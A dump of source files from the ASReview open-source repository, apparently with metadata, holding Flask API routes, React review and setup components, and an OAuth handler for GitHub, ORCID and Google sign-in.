df = data.to_frame(name=\"Relevant\").reset_index(drop=True).cumsum()\n df[\"Total\"] = df.index + 1\n df[\"Random\"] = (df[\"Total\"] * (df[\"Relevant\"][-1:] / n_records).values).round()\n\n df = df.round(1).to_dict(orient=\"records\")\n for d in df:\n d[\"x\"] = d.pop(\"Total\")\n\n df_asreview = [{k: v for k, v in d.items() if k != \"Random\"} for d in df]\n for d in df_asreview:\n d[\"y\"] = d.pop(\"Relevant\")\n\n df_random = [{k: v for k, v in d.items() if k != \"Relevant\"} for d in df]\n for d in df_random:\n d[\"y\"] = d.pop(\"Random\")\n\n payload = {\"asreview\": df_asreview, \"random\": df_random}\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/record/<doc_id>\", methods=[\"POST\", \"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_classify_instance(project, doc_id): # noqa: F401\n \"\"\"Label item\n\n This request handles the document identifier and the corresponding label.\n The result is stored in a temp location. If this storage exceeds a certain\n amount of values, then the model is triggered. The values of the location\n are passed to the model and the storaged is cleared. This model will run\n in the background.\n \"\"\"\n # return the combination of document_id and label.\n record_id = int(request.form.get(\"doc_id\"))\n label = int(request.form.get(\"label\"))\n note = request.form.get(\"note\", type=str)\n if not note:\n note = None\n\n is_prior = request.form.get(\"is_prior\", default=False)\n\n retrain_model = False if is_prior == \"1\" else True\n prior = True if is_prior == \"1\" else False\n\n if request.method == \"POST\":\n with open_state(project.project_path, read_only=False) as state:\n # add the labels as prior data\n state.add_labeling_data(\n record_ids=[record_id], labels=[label], notes=[note], prior=prior\n )\n\n elif request.method == \"PUT\":\n with open_state(project.project_path, read_only=False) as state:\n if label in [0, 1]:\n state.update_decision(record_id, label, note=note)\n elif label == -1:\n state.delete_record_labeling_data(record_id)\n\n if retrain_model:\n # retrain model\n subprocess.Popen(\n [\n _get_executable(),\n \"-m\",\n \"asreview\",\n \"web_run_model\",\n str(project.project_path),\n ]\n )\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/<project_id>/get_document\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_document(project): # noqa: F401\n \"\"\"Retrieve documents in order of review.\n\n After these documents were retrieved, the queue on the client side is\n updated.\n This request can get triggered after each document classification.\n Although it might be better to call this function after 20 requests on the\n client side.\n \"\"\"\n with open_state(project.project_path, read_only=False) as state:\n # First check if there is a pending record.\n _, _, pending = state.get_pool_labeled_pending()\n if not pending.empty:\n record_ids = pending.to_list()\n # Else query for a new record.\n else:\n record_ids = state.query_top_ranked(1)\n\n if len(record_ids) > 0:\n new_instance = record_ids[0]\n\n as_data = read_data(project)\n record = as_data.record(int(new_instance))\n\n item = {}\n item[\"title\"] = record.title\n item[\"authors\"] = record.authors\n item[\"abstract\"] = record.abstract\n item[\"doi\"] = record.doi\n item[\"url\"] = record.url\n\n # return the debug label\n debug_label = record.extra_fields.get(\"debug_label\", None)\n item[\"_debug_label\"] = int(debug_label) if pd.notnull(debug_label) else None\n\n item[\"doc_id\"] = new_instance\n pool_empty = False\n else:\n # end of pool\n project.update_review(status=\"finished\")\n item = None\n pool_empty = True\n\n return jsonify({\"result\": item, \"pool_empty\": pool_empty})\n\n\[email protected](\"/projects/<project_id>/delete\", methods=[\"DELETE\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_delete_project(project): # noqa: F401\n \"\"\"\"\"\"\n\n if project.project_path.exists() and project.project_path.is_dir():\n try:\n # remove from database if applicable\n if app_is_authenticated(current_app):\n project = Project.query.filter(\n and_(\n Project.project_id == project.project_id,\n Project.owner_id == current_user.id,\n )\n ).one_or_none()\n\n if project is not None:\n DB.session.delete(project)\n DB.session.commit()\n else:\n return jsonify(message=\"Failed to delete project in DB.\"), 500\n\n # and remove the folder\n shutil.rmtree(project.project_path)\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to delete project.\"), 500\n\n response = jsonify({\"success\": True})\n\n return response\n" }, { "alpha_fraction": 0.5635679364204407, "alphanum_fraction": 0.5644367337226868, "avg_line_length": 23.31690216064453, "blob_id": "50e7927bacaff49d1139b9b1b1d40323c7cb469b", "content_id": "f66f2600d0b87fe06cf3a7c5584502103c7d8894", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6906, "license_type": "permissive", "max_line_length": 79, "num_lines": 284, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/ReviewPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQuery, useQueryClient } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport { Box, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { ActionsFeedbackBar } from \"../../Components\";\nimport {\n DecisionButton,\n DecisionUndoBar,\n ExplorationModeBanner,\n RecordCard,\n} from \"../ReviewComponents\";\n\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { useKeyPress } from \"../../hooks/useKeyPress\";\n\nimport \"./ReviewPage.css\";\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n}));\n\nconst ReviewPage = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [explorationMode, setExplorationMode] = React.useState(false);\n const [activeRecord, setActiveRecord] = React.useState(null);\n const [previousRecord, setPreviousRecord] = React.useState({\n record: null,\n label: null,\n note: null,\n show: false,\n });\n const [recordNote, setRecordNote] = React.useState({\n expand: false,\n shrink: true, // for smooth transition\n data: \"\",\n });\n const [undoState, setUndoState] = React.useState({\n open: false,\n message: null,\n });\n\n const relevantPress = useKeyPress(\"r\");\n const irrelevantPress = useKeyPress(\"i\");\n const undoPress = useKeyPress(\"u\");\n const notePress = useKeyPress(\"n\");\n\n const recordQuery = useQuery(\n [\"fetchRecord\", { project_id }],\n ProjectAPI.fetchRecord,\n {\n refetchOnWindowFocus: false,\n onSuccess: (data) => {\n if (data[\"pool_empty\"]) {\n queryClient.invalidateQueries(\"fetchInfo\");\n } else {\n setActiveRecord(data[\"result\"]);\n }\n },\n },\n );\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateClassification,\n {\n onMutate: (variables) => {\n closeUndoBar(); // hide potentially active undo bar\n setPreviousRecord({\n record: activeRecord,\n label: variables.label,\n note: variables.note,\n show: false,\n });\n },\n onSuccess: (data, variables) => {\n setActiveRecord(null);\n resetNote();\n queryClient.invalidateQueries(\"fetchRecord\");\n showUndoBarIfNeeded(variables.label, variables.initial);\n },\n },\n );\n\n /**\n * Previous record config\n */\n const loadPreviousRecord = () => {\n setPreviousRecord((s) => {\n return {\n ...s,\n show: true,\n };\n });\n setActiveRecord(previousRecord.record);\n setRecordNote((s) => {\n return {\n ...s,\n data: previousRecord.note,\n };\n });\n };\n\n const resetPreviousRecord = () => {\n setPreviousRecord({\n record: null,\n label: null,\n note: null,\n show: false,\n });\n };\n\n /**\n * Undo bar config\n */\n const showUndoBar = (message) => {\n setUndoState({\n open: true,\n message: message,\n });\n };\n\n const showUndoBarIfNeeded = (label, initial) => {\n if (props.undoEnabled) {\n const mark = label === 0 ? \"irrelevant\" : \"relevant\";\n const message = initial ? `Label saved as ${mark}` : \"Changes saved\";\n showUndoBar(message);\n }\n };\n\n const closeUndoBar = () => {\n setUndoState({\n open: false,\n message: null,\n });\n };\n\n const undoDecision = () => {\n closeUndoBar();\n loadPreviousRecord();\n };\n\n /**\n * Decision button config\n */\n const disableButton = () => {\n return !activeRecord || isLoading;\n };\n\n const needsClassification = (label) => {\n if (!previousRecord.show) {\n return true;\n }\n return (\n label !== previousRecord.label || recordNote.data !== previousRecord.note\n );\n };\n\n const skipClassification = () => {\n setActiveRecord(recordQuery.data[\"result\"]);\n resetPreviousRecord();\n resetNote();\n };\n\n const makeDecision = (label) => {\n if (!needsClassification(label)) {\n skipClassification();\n } else {\n mutate({\n project_id: project_id,\n doc_id: activeRecord.doc_id,\n label: label,\n note: recordNote.data,\n initial: !previousRecord.show,\n });\n }\n };\n\n /**\n * Note field config\n */\n const resetNote = () => {\n setRecordNote({\n expand: false,\n shrink: true,\n data: \"\",\n });\n };\n\n const noteFieldAutoFocus = () => {\n return !notePress;\n };\n\n /**\n * Display banner when in Exploration Mode\n */\n React.useEffect(() => {\n if (props.projectMode === \"explore\") {\n setExplorationMode(true);\n }\n }, [props.projectMode]);\n\n /**\n * Use keyboard shortcuts\n */\n React.useEffect(() => {\n if (props.keyPressEnabled && !recordNote.expand) {\n if (relevantPress && activeRecord) {\n makeDecision(1);\n }\n if (irrelevantPress && activeRecord) {\n makeDecision(0);\n }\n if (undoPress && activeRecord && undoState.open && props.undoEnabled) {\n undoDecision();\n }\n if (notePress && activeRecord) {\n setRecordNote((s) => {\n return {\n ...s,\n expand: true,\n shrink: false,\n };\n });\n }\n }\n // eslint-disable-next-line react-hooks/exhaustive-deps\n }, [relevantPress, irrelevantPress, undoPress, notePress]);\n\n return (\n <Root aria-label=\"review page\">\n <Fade in>\n <Box className=\"review-page-body-wrapper\">\n <Box className=\"review-page-body\">\n {/* Banner Exploration Mode */}\n <ExplorationModeBanner\n explorationMode={explorationMode}\n setExplorationMode={setExplorationMode}\n />\n {/* Article card */}\n <RecordCard\n disableButton={disableButton}\n error={recordQuery.error}\n isError={recordQuery.isError}\n activeRecord={activeRecord}\n recordNote={recordNote}\n setRecordNote={setRecordNote}\n fontSize={props.fontSize}\n mobileScreen={props.mobileScreen}\n noteFieldAutoFocus={noteFieldAutoFocus}\n previousRecord={previousRecord}\n />\n </Box>\n {/* Decision button */}\n <DecisionButton\n disableButton={disableButton}\n makeDecision={makeDecision}\n mobileScreen={props.mobileScreen}\n previousRecord={previousRecord}\n />\n </Box>\n </Fade>\n {/* Decision undo bar */}\n <DecisionUndoBar\n disableButton={disableButton}\n state={undoState}\n undo={undoDecision}\n close={closeUndoBar}\n />\n {/* Error handler */}\n {isError && (\n <ActionsFeedbackBar\n feedback={error?.message + \" Please try again.\"}\n open={isError}\n onClose={reset}\n />\n )}\n </Root>\n );\n};\n\nexport default ReviewPage;\n" }, { "alpha_fraction": 0.6583850979804993, "alphanum_fraction": 0.6583850979804993, "avg_line_length": 20.46666717529297, "blob_id": "d47fce1d0960563aa5f464a88533be9bd2b103c4", "content_id": "b268665a7f3a1dc44366e16d53408b5e771e0004", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 322, "license_type": "permissive", "max_line_length": 52, "num_lines": 15, "path": "/asreview/webapp/src/context/AuthProvider.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\n\nconst AuthContext = React.createContext({});\n\nexport const AuthProvider = ({ children }) => {\n const [auth, setAuth] = React.useState(null);\n\n return (\n <AuthContext.Provider value={{ auth, setAuth }}>\n {children}\n </AuthContext.Provider>\n );\n};\n\nexport default AuthContext;\n" }, { "alpha_fraction": 0.5860509276390076, "alphanum_fraction": 0.5881932973861694, "avg_line_length": 30.350746154785156, "blob_id": "2418a308313d47bbe27511c27d3183d3e04f79d2", "content_id": "072cbe62e102388b351653f9bd0cb7279dd7c0c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4201, "license_type": "permissive", "max_line_length": 148, "num_lines": 134, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/DataForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { Box, CircularProgress, Stack, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { DataFormCard } from \"../DataComponents\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps } from \"../../../globals.js\";\n\nconst PREFIX = \"DataForm\";\n\nconst classes = {\n title: `${PREFIX}-title`,\n loading: `${PREFIX}-loading`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.title}`]: {\n paddingBottom: 24,\n },\n\n [`& .${classes.loading}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n },\n}));\n\nconst DataForm = (props) => {\n const queryClient = useQueryClient();\n\n const { data, error, isError, isFetching } = useQuery(\n [\"fetchData\", { project_id: props.project_id }],\n ProjectAPI.fetchData,\n {\n enabled: props.project_id !== null && props.datasetAdded,\n refetchOnWindowFocus: false,\n },\n );\n\n const priorAdded = () => {\n return (\n props.labeledStats &&\n props.labeledStats.n_inclusions !== 0 &&\n props.labeledStats.n_exclusions !== 0\n );\n };\n\n const refetchData = () => {\n queryClient.resetQueries(\"fetchData\");\n };\n\n const refetchInfo = () => {\n queryClient.prefetchQuery(\n [\"fetchInfo\", { project_id: props.project_id }],\n ProjectAPI.fetchInfo,\n );\n };\n\n const refetchLabeledStats = () => {\n queryClient.resetQueries(\"fetchLabeledStats\");\n };\n\n return (\n <Root>\n <Box className={classes.title}>\n <Typography variant=\"h6\">Data</Typography>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n A dataset contains textual records (e.g., abstracts of scientific\n papers, newspaper articles) that you want to label in interaction with\n the AI. Prior knowledge is required to warm up the AI.\n </Typography>\n </Box>\n {!props.isFetchInfoError &&\n (isFetching || props.isFetchingLabeledStats) && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetching && isError && (\n <InlineErrorHandler\n message={error?.message}\n refetch={refetchData}\n button={true}\n />\n )}\n {props.isFetchInfoError && (\n <InlineErrorHandler\n message={props.fetchInfoError?.message}\n refetch={refetchInfo}\n button={true}\n />\n )}\n {!props.isFetchingLabeledStats && props.isFetchLabeledStatsError && (\n <InlineErrorHandler\n message={props.fetchLabeledStatsError?.message}\n refetch={refetchLabeledStats}\n button={true}\n />\n )}\n {!isFetching &&\n !props.isFetchingLabeledStats &&\n !isError &&\n !props.isFetchLabeledStatsError && (\n <Stack direction=\"column\" spacing={3}>\n <DataFormCard\n added={props.datasetAdded}\n primaryDefault=\"Add dataset\"\n primaryAdded={\n <React.Fragment>\n Dataset <i>{data?.filename}</i> added\n </React.Fragment>\n }\n secondaryDefault=\"Import a dataset or select a built-in dataset\"\n secondaryAdded={`Contains ${data?.n_rows} records with approximate ${data?.n_duplicates} duplicates`}\n toggleAddCard={props.toggleAddDataset}\n />\n <DataFormCard\n added={priorAdded()}\n datasetAdded={props.datasetAdded}\n primaryDefault=\"Add prior knowledge\"\n primaryAdded=\"Prior knowledge added\"\n secondaryDefault=\"Label at least 1 relevant and 1 irrelevant record to warm up the AI\"\n secondaryAdded={`${props.labeledStats?.n_prior_inclusions} relevant and ${props.labeledStats?.n_prior_exclusions} irrelevant records`}\n toggleAddCard={props.toggleAddPriorKnowledge}\n />\n </Stack>\n )}\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(DataForm);\n" }, { "alpha_fraction": 0.5304224491119385, "alphanum_fraction": 0.5334174036979675, "avg_line_length": 36.761905670166016, "blob_id": "c1531ed384b2dc34b6406680731242f8b72d0ebb", "content_id": "d54a0066ea24f97027dc2ab2b46de564f31ed565", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6344, "license_type": "permissive", "max_line_length": 87, "num_lines": 168, "path": "/asreview/webapp/authentication/oauth_handler.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport requests\n\n\nclass OAuthHandler:\n def __init__(self, configs=None):\n if not (bool(configs) and isinstance(configs, dict)):\n raise ValueError(\"OAuthHandler needs a configuration dictionary.\")\n\n # check if all necessary config parameters are there\n services = {}\n for provider, config in configs.items():\n # get required parameters\n authorization_url = config.get(\"AUTHORIZATION_URL\", False)\n token_url = config.get(\"TOKEN_URL\", False)\n client_id = config.get(\"CLIENT_ID\", False)\n secret = config.get(\"CLIENT_SECRET\", False)\n scope = config.get(\"SCOPE\", \"\")\n if not (\n all(\n [\n bool(authorization_url),\n bool(token_url),\n bool(client_id),\n bool(secret),\n ]\n )\n ):\n raise ValueError(f\"OAuthHandler has insufficient data for {provider}\")\n else:\n # rebuild config\n services[provider.lower()] = {\n \"authorization_url\": authorization_url,\n \"token_url\": token_url,\n \"client_id\": client_id,\n \"secret\": secret,\n \"scope\": scope,\n }\n # set the config dictionary\n self.services = services\n\n def front_end_params(self):\n \"\"\"prepare a service dictionary for front-end: remove secrets\"\"\"\n result = {}\n # remove secret from service parameters\n for k, v in self.services.items():\n c = v.copy()\n c.pop(\"secret\")\n result[k] = c\n return result\n\n def providers(self):\n \"\"\"Returns a list with stored providers\"\"\"\n return list(self.services.keys())\n\n def get_user_credentials(self, provider, code, redirect_uri=None):\n \"\"\"Extract User credentials with the help of a code\"\"\"\n result = False\n if provider == \"github\":\n result = self.__handle_github(code)\n elif provider == \"orcid\":\n result = self.__handle_orcid(code)\n elif provider == \"google\":\n result = self.__handle_google(code, redirect_uri)\n else:\n raise ValueError(f\"Could not find provider {provider}\")\n return result\n\n def __handle_orcid(self, code):\n \"\"\"Handles OAuth roundtrip for Orcid\"\"\"\n # request token\n params = self.services[\"orcid\"]\n response = requests.post(\n params[\"token_url\"],\n data={\n \"code\": code,\n \"client_id\": params[\"client_id\"],\n \"client_secret\": params[\"secret\"],\n \"grant_type\": \"authorization_code\",\n \"scope\": \"/authenticate\",\n },\n headers={\"Accept\": \"application/json\"},\n ).json()\n id = response[\"orcid\"]\n name = response.get(\"name\", \"\")\n # TODO@Casper: I don't understand why I can't\n # get an email address from the public API. The\n # next call responds with a 401 Unauthorized which\n # doesn't make sense (I've set my email address on 'public')\n # because the call and the scope should OK. Why!?\n # token = response['access_token']\n # response = requests.get(\n # f'https://api.sandbox.orcid.org/v3.0/{id}/email',\n # headers={\n # 'Authorization': f'Bearer {token}',\n # 'Accept': 'application/json'\n # }\n # ).json()\n # print(response.json())\n return (id, \"email-unknown\", name)\n\n def __handle_github(self, code):\n \"\"\"Handles OAuth roundtrip for GitHub\"\"\"\n # request token\n params = self.services[\"github\"]\n response = requests.post(\n params[\"token_url\"],\n data={\n \"code\": code,\n \"client_id\": params[\"client_id\"],\n \"client_secret\": params[\"secret\"],\n },\n headers={\"Accept\": \"application/json\"},\n ).json()\n # if all is well, we hava a token\n token = response.get(\"access_token\", \"\")\n # get a user profile\n response = requests.get(\n \"https://api.github.com/user\",\n headers={\"Authorization\": f\"Bearer {token}\", \"Accept\": \"application/json\"},\n )\n response = response.json()\n id = response[\"id\"]\n email = response.get(\"email\", \"email-unknown\")\n name = response[\"name\"] or response[\"login\"] or response[\"id\"]\n return (id, email, name)\n\n def __handle_google(self, code, redirect_uri):\n # request token\n params = self.services[\"google\"]\n response = requests.post(\n params[\"token_url\"],\n data={\n \"code\": code,\n \"client_id\": params[\"client_id\"],\n \"client_secret\": params[\"secret\"],\n \"grant_type\": \"authorization_code\",\n \"redirect_uri\": redirect_uri,\n },\n headers={\"Accept\": \"application/json\"},\n ).json()\n # if all is well, we hava a token\n token = response.get(\"access_token\", \"\")\n # get email\n response = requests.post(\n \"https://www.googleapis.com/oauth2/v3/userinfo\",\n data={\"access_token\": token},\n headers={\"Accept\": \"application/json\"},\n ).json()\n id = response[\"sub\"]\n email = response.get(\"email\", \"email-unknown\")\n name = (\n response.get(\"name\", False) or response.get(\"family_name\", False) or \"Name\"\n )\n return (id, email, name)\n" }, { "alpha_fraction": 0.5171048641204834, "alphanum_fraction": 0.5206389427185059, "avg_line_length": 26.312742233276367, "blob_id": "ba13e9bb5062f5fb69e7aea19ae81bc0b15836e8", "content_id": "e3e8a5e8f47336ad0543b9c536fe8abed4e544aa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7074, "license_type": "permissive", "max_line_length": 74, "num_lines": 259, "path": "/asreview/webapp/src/Components/HelpDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Avatar,\n Card,\n CardActionArea,\n CardHeader,\n CircularProgress,\n Dialog,\n DialogContent,\n DialogTitle,\n Divider,\n List,\n ListItem,\n ListItemIcon,\n ListItemText,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport {\n Close,\n Description,\n Feedback,\n QuestionAnswer,\n} from \"@mui/icons-material\";\n\nimport {\n AppBarWithinDialog,\n BoxErrorHandler,\n OpenInNewIconStyled,\n} from \"../Components\";\nimport { StyledIconButton } from \"../StyledComponents/StyledButton.js\";\n\nimport { UtilsAPI } from \"../api/index.js\";\nimport { feedbackURL } from \"../globals.js\";\nimport { toggleHelpDialog } from \"../redux/actions\";\n\nconst mapStateToProps = (state) => {\n return {\n onHelpDialog: state.onHelpDialog,\n };\n};\n\nconst mapDispatchToProps = (dispatch) => {\n return {\n toggleHelpDialog: () => {\n dispatch(toggleHelpDialog());\n },\n };\n};\n\nconst PREFIX = \"HelpDialog\";\n\nconst classes = {\n faq: `${PREFIX}-faq`,\n faqHeight: `${PREFIX}-faq-height`,\n contact: `${PREFIX}-contact`,\n contactAvatar: `${PREFIX}-contact-avatar`,\n divider: `${PREFIX}-divider`,\n sectionTitle: `${PREFIX}-section-title`,\n};\n\nconst StyledDialog = styled(Dialog)(({ theme }) => ({\n [`& .${classes.faq}`]: {\n height: 250,\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.faqHeight}`]: {\n minHeight: 353,\n },\n\n [`& .${classes.contact}`]: {\n width: \"100%\",\n marginLeft: 20,\n marginRight: 20,\n },\n\n [`& .${classes.contactAvatar}`]: {\n width: theme.spacing(4),\n height: theme.spacing(4),\n color: theme.palette.getContrastText(theme.palette.primary.main),\n backgroundColor: theme.palette.primary.main,\n },\n\n [`& .${classes.divider}`]: {\n marginTop: 8,\n marginBottom: 8,\n },\n\n [`& .${classes.sectionTitle}`]: {\n paddingLeft: 20,\n },\n}));\n\nconst HelpDialog = (props) => {\n const descriptionElementRef = React.useRef(null);\n\n const { data, error, isError, isFetched, isFetching } = useQuery(\n \"fetchFAQ\",\n UtilsAPI.fetchFAQ,\n {\n enabled: props.onHelpDialog,\n refetchOnWindowFocus: false,\n },\n );\n\n React.useEffect(() => {\n if (props.onHelpDialog) {\n const { current: descriptionElement } = descriptionElementRef;\n if (descriptionElement !== null) {\n descriptionElement.focus();\n }\n }\n }, [props.onHelpDialog]);\n\n return (\n <StyledDialog\n fullScreen={props.mobileScreen}\n open={props.onHelpDialog}\n onClose={props.toggleHelpDialog}\n scroll=\"paper\"\n fullWidth\n maxWidth=\"sm\"\n >\n {!props.mobileScreen && (\n <Stack className=\"dialog-header\" direction=\"row\" spacing={1}>\n <StyledIconButton className=\"dialog-header-button left-empty\" />\n <DialogTitle>Help</DialogTitle>\n <Tooltip title=\"Close\">\n <StyledIconButton\n className=\"dialog-header-button right\"\n onClick={props.toggleHelpDialog}\n >\n <Close />\n </StyledIconButton>\n </Tooltip>\n </Stack>\n )}\n {props.mobileScreen && (\n <AppBarWithinDialog\n onClickStartIcon={props.toggleHelpDialog}\n title=\"Help\"\n />\n )}\n <DialogContent dividers sx={{ padding: \"0px 0px 20px 0px\" }}>\n <List className={classes.faqHeight}>\n <ListItem>\n <Typography className={classes.sectionTitle} display=\"block\">\n <b>Frequently Asked Questions</b>\n </Typography>\n </ListItem>\n {!isError && isFetching && (\n <Stack className={classes.faq}>\n <CircularProgress />\n </Stack>\n )}\n {!isError &&\n isFetched &&\n data.map((element, index) => (\n <ListItem\n key={element.url}\n button\n component={\"a\"}\n href={element.url}\n target=\"_blank\"\n alignItems=\"flex-start\"\n >\n <ListItemIcon sx={{ justifyContent: \"center\" }}>\n <Description color=\"primary\" />\n </ListItemIcon>\n <ListItemText\n key={element.title}\n primary={\n <React.Fragment>\n {element.title} <OpenInNewIconStyled />\n </React.Fragment>\n }\n />\n </ListItem>\n ))}\n {isError && (\n <Stack className={classes.faq}>\n <BoxErrorHandler error={error} queryKey=\"fetchFAQ\" />\n </Stack>\n )}\n <ListItem\n button\n component={\"a\"}\n href={`https://asreview.readthedocs.io/en/latest/`}\n target=\"_blank\"\n >\n <ListItemIcon></ListItemIcon>\n <Typography display=\"block\" color=\"primary\">\n <b>Browse the documentation</b> <OpenInNewIconStyled />\n </Typography>\n </ListItem>\n </List>\n <Divider className={classes.divider} />\n <List>\n <ListItem>\n <Typography className={classes.sectionTitle} display=\"block\">\n <b>Need more help?</b>\n </Typography>\n </ListItem>\n <ListItem>\n <Card className={classes.contact}>\n <CardActionArea\n href={`https://github.com/asreview/asreview/discussions`}\n target=\"_blank\"\n >\n <CardHeader\n avatar={\n <Avatar className={classes.contactAvatar}>\n <QuestionAnswer fontSize=\"small\" />\n </Avatar>\n }\n title={\n <React.Fragment>\n Ask the ASReview Community <OpenInNewIconStyled />\n </React.Fragment>\n }\n subheader=\"Get answers from experts in the community\"\n />\n </CardActionArea>\n </Card>\n </ListItem>\n\n <ListItem>\n <Card className={classes.contact}>\n <CardActionArea href={feedbackURL} target=\"_blank\">\n <CardHeader\n avatar={\n <Avatar className={classes.contactAvatar}>\n <Feedback fontSize=\"small\" />\n </Avatar>\n }\n title={\n <React.Fragment>\n Send Feedback <OpenInNewIconStyled />\n </React.Fragment>\n }\n subheader=\"Report bugs or request features on GitHub\"\n />\n </CardActionArea>\n </Card>\n </ListItem>\n </List>\n </DialogContent>\n </StyledDialog>\n );\n};\n\nexport default connect(mapStateToProps, mapDispatchToProps)(HelpDialog);\n" }, { "alpha_fraction": 0.5143827795982361, "alphanum_fraction": 0.5186862945556641, "avg_line_length": 26.25308609008789, "blob_id": "b14461bb05063c9238db020c526adab71c048b70", "content_id": "385850a5831d247f9d10848d39b33cd31e229a31", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4415, "license_type": "permissive", "max_line_length": 80, "num_lines": 162, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/DatasetFromURL.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { InputBase, Paper, Stack } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { useMutation } from \"react-query\";\n\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport InputLabel from \"@mui/material/InputLabel\";\nimport MenuItem from \"@mui/material/MenuItem\";\nimport FormControl from \"@mui/material/FormControl\";\nimport Select from \"@mui/material/Select\";\nimport ArrowForwardOutlinedIcon from \"@mui/icons-material/ArrowForwardOutlined\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { StyledLoadingButton } from \"../../../StyledComponents/StyledButton\";\nimport { ProjectAPI } from \"../../../api/index.js\";\n\nconst PREFIX = \"DatasetFromURL\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n input: `${PREFIX}-input`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.root}`]: {\n alignItems: \"center\",\n },\n\n [`& .${classes.input}`]: {\n display: \"flex\",\n alignItems: \"center\",\n width: \"100%\",\n padding: \"4px 8px\",\n },\n}));\n\nconst DatasetFromURL = (props) => {\n const [localURL, setLocalURL] = React.useState(\"\");\n\n const { error, isError, isLoading, mutate, data } = useMutation(\n ProjectAPI.mutateData,\n {\n onSuccess: (data, variables, context) => {\n if (data[\"files\"] && data[\"files\"].length === 1) {\n props.setURL(data[\"files\"][0][\"link\"]);\n }\n },\n },\n );\n\n const handleURL = (event) => {\n setLocalURL(event.target.value);\n };\n\n const addURL = (event) => {\n // validate the url first\n mutate({ project_id: props.project_id, url: localURL, validate: true });\n };\n\n const addURLOnEnter = (event) => {\n if (event.keyCode === 13) {\n addURL(event);\n }\n };\n\n const addFile = (event) => {\n // upload dataset\n props.handleSaveDataset();\n };\n\n const handleFileChange = (event) => {\n props.setURL(event.target.value);\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n <Paper\n className={classes.input}\n component=\"form\"\n noValidate\n autoComplete=\"off\"\n onSubmit={(e) => e.preventDefault()}\n variant=\"outlined\"\n >\n <InputBase\n autoFocus\n disabled={props.isAddingDataset || isLoading}\n fullWidth\n id=\"url-dataset\"\n placeholder=\"Type a URL or DOI of the dataset\"\n value={localURL}\n onChange={handleURL}\n onKeyDown={addURLOnEnter}\n sx={{ ml: 1, flex: 1 }}\n />\n <StyledLoadingButton\n disabled={!localURL || props.isAddingDataset}\n loading={isLoading}\n onClick={addURL}\n sx={{ minWidth: \"32px\" }}\n >\n <ArrowForwardOutlinedIcon />\n </StyledLoadingButton>\n </Paper>\n\n {data && data[\"files\"] && (\n <FormControl\n sx={{ m: 1, minWidth: 120 }}\n disabled={props.isAddingDataset || data[\"files\"].length === 1}\n >\n <InputLabel id=\"select-file-label\">Select dataset</InputLabel>\n <Select\n labelId=\"select-file-label\"\n id=\"select-file\"\n value={props.url}\n label=\"Select dataset\"\n onChange={handleFileChange}\n >\n {data[\"files\"].map((val, id) => {\n return (\n 